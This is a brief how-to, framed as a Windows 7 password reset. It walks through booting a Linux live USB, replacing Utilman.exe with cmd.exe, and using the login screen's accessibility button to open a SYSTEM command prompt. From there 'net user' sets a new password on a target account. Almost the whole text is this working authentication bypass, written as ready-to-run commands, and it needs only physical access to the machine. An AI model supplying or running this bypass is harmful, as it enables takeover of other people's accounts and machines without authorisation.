Reset Password Windows 7

-> Create LiveUsb ( Ubuntu /Linux-MInt /other)
-> Booting with LiveUsb
-> mount partition windows target
-> Ctrl+Alt+T
$ mv /media/xxx/Windows/System32/Utilman.exe /media/xxx/windows/system32/Utilman.bak.exe
$ cp /media/xxx/windows/System32/cmd.exe /media/xxx/Windows/System32/Utilman.exe
reboot
-> remove LiveUsb
-> in login screen ,click the bottom left corner
-> cmd prompt , type
C:\Windows\System32> net user user_target NewPassword
-> Done :D
